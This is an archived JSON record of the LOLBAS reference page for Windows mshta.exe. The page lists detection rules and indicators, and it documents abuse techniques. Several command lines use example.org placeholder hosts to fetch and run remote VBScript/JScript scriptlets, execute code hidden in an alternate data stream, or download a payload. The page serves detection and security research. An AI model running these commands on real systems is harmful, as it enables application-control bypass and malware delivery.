{
	"id": "a306cfed-124c-4b30-9040-bee7635e0f9e",
	"created_at": "2026-04-06T01:30:53.210582Z",
	"updated_at": "2026-04-10T03:21:07.045242Z",
	"deleted_at": null,
	"sha1_hash": "3b5a70923afc132c1fbea61bffc56828fd9f157e",
	"title": "Mshta on LOLBAS",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 65948,
	"plain_text": "Mshta on LOLBAS\r\nArchived: 2026-04-06 00:51:45 UTC\r\n.. /Mshta.exe\r\nUsed by Windows to execute html applications. (.hta)\r\nPaths:\r\nC:\\Windows\\System32\\mshta.exe\r\nC:\\Windows\\SysWOW64\\mshta.exe\r\nResources:\r\nhttps://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct\r\nhttps://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/\r\nhttps://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/\r\nAcknowledgements:\r\nCasey Smith (@subtee)\r\nOddvar Moe (@oddvarmoe)\r\nNir Chako (Pentera) (@C_h4ck_0)\r\nDetections:\r\nSigma: proc_creation_win_mshta_susp_pattern.yml\r\nSigma: proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml\r\nSigma: proc_creation_win_mshta_lethalhta_technique.yml\r\nSigma: proc_creation_win_mshta_javascript.yml\r\nSigma: file_event_win_net_cli_artefact.yml\r\nSigma: image_load_susp_script_dotnet_clr_dll_load.yml\r\nElastic: defense_evasion_mshta_beacon.toml\r\nElastic: lateral_movement_dcom_hta.toml\r\nElastic: defense_evasion_suspicious_managedcode_host_process.toml\r\nSplunk: suspicious_mshta_activity.yml\r\nSplunk: detect_mshta_renamed.yml\r\nSplunk: suspicious_mshta_spawn.yml\r\nSplunk: suspicious_mshta_child_process.yml\r\nSplunk: detect_mshta_url_in_command_line.yml\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Mshta/\r\nPage 1 of 4\n\nBlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules\r\nIOC: mshta.exe executing raw or obfuscated script within the command-line\r\nIOC: General usage of HTA file\r\nIOC: msthta.exe network connection to Internet/WWW resource\r\nIOC: DotNet CLR libraries loaded into mshta.exe\r\nIOC: DotNet CLR Usage Log - mshta.exe.log\r\nExecute\r\n1. Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.\r\nmshta.exe file.hta\r\nUse case\r\nExecute code\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218.005: Mshta\r\nTags\r\nExecute: HTA\r\nExecute: Remote\r\n2. Executes VBScript supplied as a command line argument.\r\nmshta.exe vbscript:Close(Execute(\"GetObject(\"\"script:https://www.example.org/file.sct\"\")\"))\r\nUse case\r\nExecute code\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218.005: Mshta\r\nTags\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Mshta/\r\nPage 2 of 4\n\nExecute: VBScript\r\n3. Executes JavaScript supplied as a command line argument.\r\nmshta.exe javascript:a=GetObject(\"script:https://www.example.org/file.sct\").Exec();close();\r\nUse case\r\nExecute code\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1218.005: Mshta\r\nTags\r\nExecute: JScript\r\nAlternate data streams\r\n1. Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.\r\nmshta.exe \"C:\\Windows\\Temp\\file.ext:file.hta\"\r\nUse case\r\nExecute code hidden in alternate data stream\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and\r\nnewer)\r\nATT\u0026CK® technique\r\nT1218.005: Mshta\r\nTags\r\nExecute: HTA\r\nDownload\r\n1. It will download a remote payload and place it in INetCache.\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Mshta/\r\nPage 3 of 4\n\nmshta.exe https://www.example.org/file.ext\r\nUse case\r\nDownloads payload from remote server\r\nPrivileges required\r\nUser\r\nOperating systems\r\nWindows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11\r\nATT\u0026CK® technique\r\nT1105: Ingress Tool Transfer\r\nTags\r\nDownload: INetCache\r\nSource: https://lolbas-project.github.io/lolbas/Binaries/Mshta/\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Mshta/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://lolbas-project.github.io/lolbas/Binaries/Mshta/"
	],
	"report_names": [
		"Mshta"
	],
	"threat_actors": [],
	"ts_created_at": 1775439053,
	"ts_updated_at": 1775791267,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3b5a70923afc132c1fbea61bffc56828fd9f157e.pdf",
		"text": "https://archive.orkl.eu/3b5a70923afc132c1fbea61bffc56828fd9f157e.txt",
		"img": "https://archive.orkl.eu/3b5a70923afc132c1fbea61bffc56828fd9f157e.jpg"
	}
}